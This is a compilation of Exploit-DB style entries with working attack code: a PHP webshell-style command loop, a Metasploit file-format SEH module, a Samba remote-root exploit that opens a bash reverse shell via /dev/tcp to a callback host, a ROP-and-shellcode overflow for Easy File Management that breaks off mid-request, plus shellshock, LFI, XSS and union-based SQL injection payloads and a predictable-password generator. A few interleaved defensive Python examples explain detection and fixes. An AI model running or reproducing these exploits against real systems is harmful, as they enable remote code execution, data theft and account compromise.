error_reporting(E_ALL);

$error[0] = "[!] This script is intended to be launched from the cli.";
if(php_sapi_name() <> "cli") die($error[0]);

if($argc < 3) {
    echo("\nUsage : php {$argv[0]} <host> <path>");
    echo("\nExample: php {$argv[0]} localhost /");
    die();
}

if(isset($argv[1]) && isset($argv[2])) {
    $host = $argv[1];
    $path = $argv[2];
}

$pack = "GET {$path}nuts/login.php?r=<?php+error_reporting(0);print(_nutCmsId_);system(base64_decode(\$_SERVER[HTTP_CMD]));die;+?> HTTP/1.0\r\n";
$pack.= "Host: {$host}\r\n";
$pack.= "Cmd: %s\r\n";
$pack.= "Connection: close\r\n\r\n";

while(1) {
    print "\nAnonymous@{$host}:~# ";
    if(($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_nutCmsId_(.*)/s", http_send($host, sprintf($pack, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

function http_send($host, $pack) {
    if(!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}\n");
    fwrite($sock, $pack);
    return stream_get_contents($sock);
}
?>
HireHackking

VideoCharge Studio - Local Buffer Overflow (SEH) (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VideoCharge Studio Buffer Overflow (SEH)',
      'Description'    => %q{
        This module exploits a stack based buffer overflow in VideoCharge Studio
        2.12.3.685 when processing a specially crafted .VSC file. This vulnerability
        could be exploited by a remote attacker to execute arbitrary code on the
        target machine by enticing a user of VideoCharge Studio to open a malicious
        .VSC file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom',             # Original discovery
          'Andrew Smith',        # MSF module
          'Christian Mehlmauer'  # MSF module
        ],
      'References'     =>
        [
          [ 'OSVDB', '69616' ],
          [ 'EDB', '29234' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "\x00\x0a\x0d\x3c\x22\x26",
          'DisableNops' => true,
          'Space'       => 2808
        },
      'Targets'        =>
        [
          [ 'VideoCharge Studio 2.12.3.685',
            {
              'Ret'    => 0x61B811F1, # p/p/r | zlib1.dll
              'Offset' => 2184
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 27 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),
      ], self.class)
  end

  def exploit
    buffer = rand_text_alpha(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded

    file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.12.3.685"> <cols name="Files"/> <cols name="Profiles"> <Property name="Profile"> <cols name="Formats"> <Property name="Stream"> <Value name="Name" type="8" value="#{buffer}"/> </Property> </cols> </Property> </cols> </config>|

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(file)
  end
end

FTP Commander 8.02 - Overwrite (SEH)

********************************************************************************************
# Exploit Title: FTP Commander 'Custom Command' SEH Over-Write (Buffer Overflow).
# Date: 8/17/2015
# Exploit Author: Un_N0n
# Software Vendor : http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/ftpcomm.htm
# Version: 8.02
# Tested on: Windows 7 x32 (32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- Open 'ftpcomm.exe'.
2- Go to FTP - Server > Custom Command.
3- Below the SERVER LIST an input box will appear; enter the contents of crash.txt into it, then press "Do it!".
4- The software will crash saying 'Access Violation at address XXXXXXXX......'.

This is a basic SEH overwrite. I have tried to make a working exploit on Win 7 x32 but had no luck, since this program does not have its own DLLs and using Windows DLLs is not a good idea because of SAFESEH; I have tried other techniques, but the final exploit seems to be unstable.

[Code to produce crash.txt]:

junk = "A"*6000
file = open("crash.txt",'w')
file.write(junk)
file.close()

The following details are for those who would like to develop a working exploit for this software:

OFFSET: 4112 + BBBB[NSEH] + CCCC[SEH] ...

Hint: ~You can try loading the address from outside the address range of loaded modules.~ ;)
*****************************************************************************************************************************

Cisco Unified Communications Manager - Multiple Vulnerabilities

Vantage Point Security Advisory 2015-001
========================================

Title:             Cisco Unified Communications Manager Multiple Vulnerabilities
Vendor:            Cisco
Vendor URL:        http://www.cisco.com/
Versions affected: <9.2, <10.5.2, <11.0.1.
Severity:          Low to medium
Vendor notified:   Yes
Reported:          Oct. 2014
Public release:    Aug. 13th, 2015
Author:            Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>

Summary:
--------

Cisco Unified Communications Manager (CUCM) offers services such as session management, voice, video, messaging, mobility, and web conferencing. During the last year, Vantage Point Security has reported four security issues to Cisco as listed below.

1. Shellshock command injection
--------------------------------

Authenticated users of CUCM can access limited functionality via the web interface and Cisco console (SSH on port 22). Because the SSH server is configured to process several environment variables from the client and a vulnerable version of bash is used, it is possible to exploit command injection via specially crafted environment variables (CVE-2014-6271 a.k.a. shellshock). This allows an attacker to spawn a shell running as the user "admin".

Several environment variables can be used to exploit the issue. Example:

$ LC_PAPER="() { x;};/bin/sh" ssh Administrator@examplecucm.com

2. Local File Inclusion
-----------------------

The application allows users to view the contents of any locally accessible files on the web server through a vulnerability known as LFI (Local File Inclusion). LFI vulnerabilities are commonly used to download application source code, configuration files and files containing sensitive information such as passwords. Exploiting this issue requires a valid user account.

https://cucm.example.com:8443/reporter-servlet/GetFileContent?Location=/&FileName=/usr/local/thirdparty/jakarta-tomcat/conf/tomcat-users.xml

3. Unauthenticated access to ping command
-----------------------------------------

The pingExecute servlet allows unauthenticated users to execute pings to arbitrary IP addresses. This could be used by an attacker to enumerate the internal network. The following URL triggers a ping of the host 10.0.0.1:

https://cucm.example.com:8443/cmplatform/pingExecute?hostname=10.0.0.1&interval=1.0&packetsize=12&count=1000&secure=false

4. Magic session ID allows unauthenticated access to SOAP calls
---------------------------------------------------------------

Authentication for some methods in the EPAS SOAP interface can be bypassed by using a hardcoded session ID. The methods "GetUserLoginInfoHandler" and "GetLoggedinXMPPUserHandler" are affected.

Fix Information:
----------------

Upgrade to CUCM version 9.2, 10.5.2 or 11.0.1.

References:
-----------

https://tools.cisco.com/quickview/bug/CSCus88031
https://tools.cisco.com/quickview/bug/CSCur49414
https://tools.cisco.com/quickview/bug/CSCum05290
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
http://tools.cisco.com/security/center/viewAlert.x?alertId=37111

Timeline:
---------

2014/10: Issues reported to Cisco;
2015/07: Confirm that all issues have been fixed.

About Vantage Point Security:
-----------------------------

Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.

https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
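Issue 1 above hinges on two conditions: the SSH server forwards client-chosen environment variables to the login shell, and the shell is a bash build that parses the "() {" function prologue out of any exported variable (CVE-2014-6271). The following is an added example written for this page, not part of the Vantage Point advisory or any Cisco code. It shows the two defender-side checks a practitioner would want: flagging environment values that carry the prologue before they reach a shell, and auditing an sshd_config fragment for AcceptEnv directives, which is the forwarding behaviour the advisory describes. The environment values and sshd_config fragments are constructed for the example; the LC_PAPER value is the one quoted in the advisory.

```python
"""Added example: Shellshock exposure checks for the SSH-forwarded-environment
case described in the advisory. Sample data is constructed for this example."""
import re

# bash function-definition prologue: optional whitespace, "()", optional
# whitespace, "{". CVE-2014-6271-era bash imports any exported variable whose
# value starts this way as a function and runs the trailing commands.
_FUNC_PROLOGUE = re.compile(r"^\s*\(\s*\)\s*\{")


def looks_like_shellshock(value: str) -> bool:
    """True if an environment value begins with the bash function prologue."""
    return bool(_FUNC_PROLOGUE.match(value))


def flag_env(env: dict) -> list:
    """Names of environment variables whose values carry the prologue, sorted."""
    return sorted(name for name, value in env.items() if looks_like_shellshock(value))


def accepted_env_patterns(sshd_config: str) -> list:
    """Every pattern listed on AcceptEnv lines of an sshd_config fragment.

    An empty result means the server forwards no client variables, which
    closes this injection path independently of the bash version in use.
    """
    patterns = []
    for raw in sshd_config.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        if parts[0].lower() == "acceptenv":       # directive names are case-insensitive
            patterns.extend(parts[1:])
    return patterns


# Constructed sample environment: the advisory's LC_PAPER value, a second
# variable carrying the same prologue with leading whitespace, and benign ones.
SAMPLE_ENV = {
    "LC_PAPER": "() { x;};/bin/sh",
    "LANG": "en_US.UTF-8",
    "TERM": "xterm-256color",
    "LC_TIME": "  () { :;}; echo injected",
}

# Constructed sshd_config fragments: one forwarding locale variables (the
# common distribution default), one forwarding nothing.
PERMISSIVE_SSHD = """
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
PermitRootLogin no
"""

HARDENED_SSHD = """
PermitRootLogin no
# AcceptEnv intentionally omitted: no client variables reach the login shell
"""

if __name__ == "__main__":
    print("suspicious variables:", flag_env(SAMPLE_ENV))
    print("permissive AcceptEnv :", accepted_env_patterns(PERMISSIVE_SSHD))
    print("hardened AcceptEnv   :", accepted_env_patterns(HARDENED_SSHD))
```

Either check alone is sufficient to block the case on this page: a patched bash ignores the prologue, and an sshd that forwards no client environment never hands the value to bash. Logging hits from flag_env on the SSH or HTTP front end is the detection counterpart.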
source: https://www.securityfocus.com/bid/55605/info

Purity theme for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Purity 1.3 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/index.php?m=top&s='><script>alert("Hacked_by_MADSEC")</script>

The "ContactName", "email", "subject" and "comments" variables are not properly sanitized before being used.

Exploit:

POST /contact/ HTTP/1.0
Content-Length: 82
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: exploit-masters.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/wordpress/contact/

contactName=>"'><script>alert("Hacked_by_MADSEC")</script>&email=&subject=&comments=&submitted=

WordPress Plugin MF Gig Calendar - Cross-Site Scripting

source: https://www.securityfocus.com/bid/55622/info

The MF Gig Calendar plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

MF Gig Calendar 0.9.4.1 is vulnerable; other versions may also be affected.

GET /wp/?page_id=2&"><script>alert('xsstest')</script> HTTP/1.1

YCommerce - Multiple SQL Injections

source: https://www.securityfocus.com/bid/55653/info

YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Proof of Concept - YCommerce Reseller
-------------------------------------

GET Param "cPath" - [Number of columns may vary]

/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

GET Param "news_id" - [Number of columns may vary]

/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

Proof of Concept - YCommerce Pro
--------------------------------

GET Param "enterprise_id" - [Number of columns may vary]

/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61

GET Param "news_id" - [Number of columns may vary]

/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

Samba 3.5.11/3.6.3 - Remote Code Execution

source: https://www.securityfocus.com/bid/55655/info

Samba is prone to an unspecified remote code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary code with root privileges. Failed exploit attempts will cause a denial-of-service condition.

#!/usr/bin/python
#
# finding targets 4 31337z:
# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
#   -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell
# found by eax samba 0day godz (loljk)

from binascii import hexlify, unhexlify
import socket
import threading
import SocketServer
import sys
import os
import time
import struct

targets = [
    {
        "name" : "samba_3.6.3-debian6",
        "chunk_offset" : 0x9148,
        "system_libc_offset" : 0xb6d003c0
    },
    {
        "name" : "samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)",
        "chunk_offset" : 4560,
        "system_libc_offset" : 0xb20
    },
    {
        "name" : "target_finder (hardcode correct system addr)",
        "chunk_offset" : 0,
        "system_libc_offset" : 0xb6d1a3c0,
        "finder": True
    }
]

do_brute = True
rs = 1024

FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])

def dump(src, length=32):
    result=[]
    for i in xrange(0, len(src), length):
        s = src[i:i+length]
        hexa = ' '.join(["%02x"%ord(x) for x in s])
        printable = s.translate(FILTER)
        result.append("%04x   %-*s   %s\n" % (i, length*3, hexa, printable))
    return ''.join(result)

sploitshake = [
    # HELLO
    "8100004420434b4644454e4543464445" + \
    "46464346474546464343414341434143" + \
    "41434143410020454745424644464545" + \
    "43455046494341434143414341434143" + \
    "4143414341414100",

    # NTLM_NEGOT
    "0000002fff534d427200000000000000" + \
    "00000000000000000000000000001d14" + \
    "00000000000c00024e54204c4d20302e" + \
    "313200",

    # SESSION_SETUP
    "0000004bff534d427300000000080000" + \
    "000000000000000000000000ffff1d14" + \
    "000000000dff000000ffff02001d1499" + \
    "1f00000000000000000000010000000e" + \
    "000000706f736978007079736d6200",

    # TREE_CONNECT
    "00000044ff534d427500000000080000" + \
    "000000000000000000000000ffff1d14" + \
    "6400000004ff00000000000100190000" + \
    "5c5c2a534d425345525645525c495043" + \
    "24003f3f3f3f3f00",

    # NT_CREATE
    "00000059ff534d42a200000000180100" + \
    "00000000000000000000000001001d14" + \
    "6400000018ff00000000050016000000" + \
    "000000009f0102000000000000000000" + \
    "00000000030000000100000040000000" + \
    "020000000306005c73616d7200"
]

pwnsauce = {
    'smb_bind': \
    "00000092ff534d422500000000000100" + \
    "00000000000000000000000001001d14" + \
    "6400000010000048000004e0ff000000" + \
    "0000000000000000004a0048004a0002" + \
    "002600babe4f005c504950455c000500" + \
    "0b03100000004800000001000000b810" + \
    "b8100000000001000000000001007857" + \
    "34123412cdabef000123456789ab0000" + \
    "0000045d888aeb1cc9119fe808002b10" + \
    "486002000000",

    'data_chunk': \
    "000010efff534d422f00000000180000" + \
    "00000000000000000000000001001d14" + \
    "640000000eff000000babe00000000ff" + \
    "0000000800b0100000b0103f00000000" + \
    "00b0100500000110000000b010000001" + \
    "0000009810000000000800",

    'final_chunk': \
    "000009a3ff534d422f00000000180000" + \
    "00000000000000000000000001001d14" + \
    "640000000eff000000babe00000000ff" + \
    "00000008006409000064093f00000000" + \
    "00640905000002100000006409000001" + \
    "0000004c09000000000800"
}

def exploit(host, port, cbhost, cbport, target):
    global sploitshake, pwnsauce

    chunk_size = 4248
    target_tcp = (host, port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(target_tcp)

    n = 0
    for pkt in sploitshake:
        s.send(unhexlify(pkt))
        pkt_res = s.recv(rs)
        n = n+1

    fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])

    s.send(unhexlify(pwnsauce['smb_bind'].replace("babe", fid)))
    pkt_res = s.recv(rs)

    buf = "X"*20                   # policy handle
    level = 2                      # LSA_POLICY_INFO_AUDIT_EVENTS
    buf+=struct.pack('<H',level)   # level
    buf+=struct.pack('<H',level)   # level2
    buf+=struct.pack('<L',1)       # auditing_mode
    buf+=struct.pack('<L',1)       # ptr
    buf+=struct.pack('<L',100000)  # r->count
    buf+=struct.pack('<L',20)      # array_size
    buf+=struct.pack('<L',0)
    buf+=struct.pack('<L',100)
    buf += ("A" * target['chunk_offset'])
    buf+=struct.pack("I", 0);
    buf+=struct.pack("I", target['system_libc_offset']);
    buf+=struct.pack("I", 0);
    buf+=struct.pack("I", target['system_libc_offset']);
    buf+=struct.pack("I", 0xe8150c70);
    buf+="AAAABBBB"

    cmd = ";;;;/bin/bash -c '/bin/bash 0</dev/tcp/"+cbhost+"/"+cbport+" 1>&0 2>&0' &\x00"
    tmp = cmd*(816/len(cmd))
    tmp += "\x00"*(816-len(tmp))
    buf+=tmp
    buf+="A"*(37192-target['chunk_offset'])
    buf+='z'*(100000 - (28000 + 10000))

    buf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)]

    n=0
    for chunk in buf_chunks:
        if len(chunk) != chunk_size:
            #print "LAST CHUNK #%d" % n
            bb = unhexlify(pwnsauce['final_chunk'].replace("babe", fid)) + chunk
            s.send(bb)
        else:
            #print "CHUNK #%d" % n
            bb = unhexlify(pwnsauce['data_chunk'].replace("babe", fid)) + chunk
            s.send(bb)
            retbuf = s.recv(rs)
        n=n+1

    s.close()

class connectback_shell(SocketServer.BaseRequestHandler):
    def handle(self):
        global do_brute

        print "\n[!] connectback shell from %s" % self.client_address[0]
        do_brute = False

        s = self.request
        import termios, tty, select, os
        old_settings = termios.tcgetattr(0)
        try:
            tty.setcbreak(0)
            c = True
            while c:
                for i in select.select([0, s.fileno()], [], [], 0)[0]:
                    c = os.read(i, 1024)
                    if c:
                        if i == 0:
                            os.write(1, c)
                        os.write(s.fileno() if i == 0 else 1, c)
        except KeyboardInterrupt: pass
        finally:
            termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
        return

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    pass

if len(sys.argv) != 6:
    print "\n  {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\n"
    print "  usage: %s <targethost> <targetport> <myip> <myport> <target>\n" % (sys.argv[0])
    print "  targets:"
    i = 0
    for target in targets:
        print "    %02d) %s" % (i, target['name'])
        i = i+1
    print ""
    sys.exit(-1)

target = targets[int(sys.argv[5])]

server = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()

while do_brute == True:
    sys.stdout.write("\r{+} TRYING EIP=\x1b[31m0x%08x\x1b[0m OFFSET=\x1b[32m0x%08x\x1b[0m" % (target['system_libc_offset'], target['chunk_offset']))
    sys.stdout.flush()
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
    if "finder" in target:
        target['chunk_offset'] += 4
    else:
        target['system_libc_offset'] += 0x1000

if "finder" in target:
    print \
        "{!} found \x1b[32mNEW\x1b[0m target: chunk_offset = ~%d, " \
        "system_libc_offset = 0x%03x" % \
        (target['chunk_offset'], target['system_libc_offset'] & 0xff000fff)

while 1:
    time.sleep(999)

server.shutdown()

CoSoSys Endpoint Protector - Predictable Password Generation

source: https://www.securityfocus.com/bid/55570/info

CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability.

Successfully exploiting this issue may allow an attacker to guess generated passwords and gain access to affected appliances.

CoSoSys Endpoint Protector 4 is vulnerable; other versions may also be affected.

function Get-EPPPassword {
<#
.Synopsis
    Get-EPPPassword calculates the predictable root password for Cososys Endpoint Protector 4 servers.

    Author: Chris Campbell (@obscuresec)
    License: BSD 3-Clause

.Description
    Get-EPPPassword

    Timeline:
        discovered 3 Mar 2012
        reported to vendor 12 Jun 2012
        reported to US-CERT 15 Jul 2012
        released 17 Sep 2012

.Example
    Get-EPPPassword -Serial 123456789

.Link
    http://obscuresecurity.blogspot.com/2012/09/cososys-predicable-password-cve-2012.html
#>

    Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $Serial)

    #function to calculate sums from serial number
    function GetSerialSum {
        if ($Serial.Length -ne 9) {
            Return "EPP Serial Number is 9 digits"
        }
        else {
            #convert $serial to an array of integers
            [int[]] $SerialArray = [char[]]$Serial | ForEach-Object {[int]"$_"}
        }
        foreach ($Number in $SerialArray) {
            $Sum += $Number
        }
        Write-Output $Sum
    }

    #function to calculate epproot password
    function GetPassword {
        Write-Output "eroot!00$Sums`RO"
    }

    $Sums = GetSerialSum
    GetPassword
}

Get-EPPPassword -Serial 135792468
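The advisory's point is that the appliance password is a function of the serial number alone, and of a lossy one at that: only the sum of the nine digits enters the password. The following is an added example written for this page, not part of the advisory or of Get-EPPPassword. It quantifies the resulting guess space without reproducing the password derivation, and sets it beside a generator a defender would replace it with, one that draws every character from the operating system's CSPRNG. The alphabet and password length are this example's own choices.

```python
"""Added example: effective keyspace of a digit-sum derived password versus a
CSPRNG-generated one. Nothing here reproduces the vendor's password format."""
import math
import secrets
import string


def digit_sum_keyspace(n_digits: int = 9) -> int:
    """Number of distinct values the sum of n decimal digits can take.

    Each digit contributes 0..9, so the sum ranges over 0..9*n inclusive.
    For the nine-digit serial on this page that is 82 possible passwords,
    however many serials the vendor ever issued.
    """
    return 9 * n_digits + 1


def entropy_bits(keyspace: int) -> float:
    """Bits of entropy for a uniformly chosen value from a keyspace of that size."""
    return math.log2(keyspace)


# Example alphabet: 52 letters + 10 digits + 32 punctuation symbols = 94.
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def generate_password(length: int = 16, alphabet: str = ALPHABET) -> str:
    """Unpredictable replacement: each position is an independent CSPRNG draw.

    secrets.choice is backed by the OS random source, so knowledge of any
    device identifier (serial, MAC, install date) tells an attacker nothing
    about the value.
    """
    return "".join(secrets.choice(alphabet) for _ in range(length))


def csprng_keyspace(length: int = 16, alphabet: str = ALPHABET) -> int:
    """Size of the space generate_password() draws from."""
    return len(alphabet) ** length


if __name__ == "__main__":
    weak = digit_sum_keyspace(9)
    strong = csprng_keyspace()
    print("digit-sum scheme : %d candidates, %.1f bits" % (weak, entropy_bits(weak)))
    print("CSPRNG 16 chars  : %d candidates, %.1f bits" % (strong, entropy_bits(strong)))
    print("sample generated password:", generate_password())
```

The comparison is the whole lesson: 82 candidates (about 6.4 bits) is a list a person can try by hand, while 94^16 (about 105 bits) is out of reach regardless of what the attacker knows about the device. A per-device secret derived from public identifiers is not a secret.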

TAGWORX.CMS - 'cid' SQL Injection

source: https://www.securityfocus.com/bid/55586/info

TAGWORX.CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/gallery.php?cid=124'&pid=124
http://www.example.com/gallery.php?cat_id=17&cid='&pid=&img=1
http://www.example.com/gallery.php?cid=124'&pid=124
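The YCommerce and TAGWORX.CMS entries above describe the same defect: a numeric request parameter (cPath, news_id, enterprise_id, cid) is pasted into the SQL text, so a value such as "1 union all select ..." becomes part of the query. The following is an added example written for this page, not code from either product. It runs the string-built query the advisories describe and the parameterised replacement side by side against an in-memory SQLite database; the schema, table names, sample rows and the union payload are constructed for the example, with the payload shaped like the advisories' "<id> union all select ..." and its column count matched to the query.

```python
"""Added example: SQL injection through a numeric parameter, the vulnerable
query beside its fix, on a constructed SQLite database."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample database: a categories table the page is meant to
    read, and a users table that a category listing must never reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE categories (id INTEGER, name TEXT, parent INTEGER);
        INSERT INTO categories VALUES (1, 'Hardware', 0), (2, 'Software', 0);
        CREATE TABLE users (id INTEGER, email TEXT, pwhash TEXT);
        INSERT INTO users VALUES (7, 'admin@example.test', 'cafebabe');
    """)
    return conn


def categories_vulnerable(conn: sqlite3.Connection, cpath: str) -> list:
    """The advisories' pattern: the request parameter becomes SQL text."""
    sql = "SELECT id, name, parent FROM categories WHERE id = " + cpath
    return conn.execute(sql).fetchall()


def categories_safe(conn: sqlite3.Connection, cpath: str) -> list:
    """Fix in two layers: enforce the parameter's type, then bind it as a value.

    A category id is an integer; anything else is rejected before the
    database sees it. What survives is passed as a bound parameter, so the
    driver never interprets it as SQL, whatever characters it contains.
    """
    try:
        cid = int(cpath)
    except ValueError:
        raise ValueError("cPath must be an integer") from None
    sql = "SELECT id, name, parent FROM categories WHERE id = ?"
    return conn.execute(sql, (cid,)).fetchall()


# Constructed payload in the advisories' shape: the legitimate id followed by
# a UNION that pulls credentials out of an unrelated table. Three columns to
# match the category query, as the "[Number of columns may vary]" notes imply.
UNION_PAYLOAD = "1 union all select id, email || ':' || pwhash, 3 from users"


def demo() -> dict:
    """Run both variants with the union payload and with a legitimate id."""
    conn = build_db()
    leaked = categories_vulnerable(conn, UNION_PAYLOAD)
    try:
        categories_safe(conn, UNION_PAYLOAD)
        safe_outcome = "accepted"
    except ValueError as exc:
        safe_outcome = str(exc)
    return {
        "vulnerable_rows": leaked,                    # category row plus a users row
        "safe_outcome": safe_outcome,                 # rejected before the query runs
        "safe_legit_rows": categories_safe(conn, "1"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-16s %s" % (key + ":", value))
```

The type check alone would stop this payload, but it is the parameter binding that matters for parameters that legitimately contain quotes or keywords (names, search terms); the two belong together.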
#!/usr/bin/python
# Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow
# Version: 5.6
# Date: 2015-08-17
# Author: Tracy Turben (tracyturben@gmail.com)
# Software Link: http://www.efssoft.com/
# Tested on: Win7x32-EN
# Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;)
# Credits for vulnerability discovery:
# superkojiman (http://www.exploit-db.com/exploits/33453/)

from struct import pack
import socket,sys
import os

host="192.168.1.15"
port=80

junk0 = "\x90" * 80

# 0x1001d89b : {pivot 604 / 0x25c}
# POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll]
# The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job!
# Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8
call_edx=pack('<L',0x1001D8C8)

junk1="\x90" * 280

ppr=pack('<L',0x10010101)  # POP EBX # POP ECX # RETN [ImageLoad.dll]

# Since 0x00 would break the exploit needs to be crafted on the stack
crafted_jmp_esp=pack('<L',0xA44162FB)

test_bl=pack('<L',0x10010125)  # contains 00000000 to pass the JNZ instruction

kungfu=pack('<L',0x10022aac)   # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll]
kungfu+=pack('<L',0xDEADBEEF)  # filler
kungfu+=pack('<L',0xDEADBEEF)  # filler
kungfu+=pack('<L',0x1001a187)  # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP
kungfu+=pack('<L',0x1002466d)  # PUSH EAX # RETN [ImageLoad.dll]

nopsled="\x90" * 20

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")

payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode

buf="GET /vfolder.ghp HTTP/1.1\r\n"
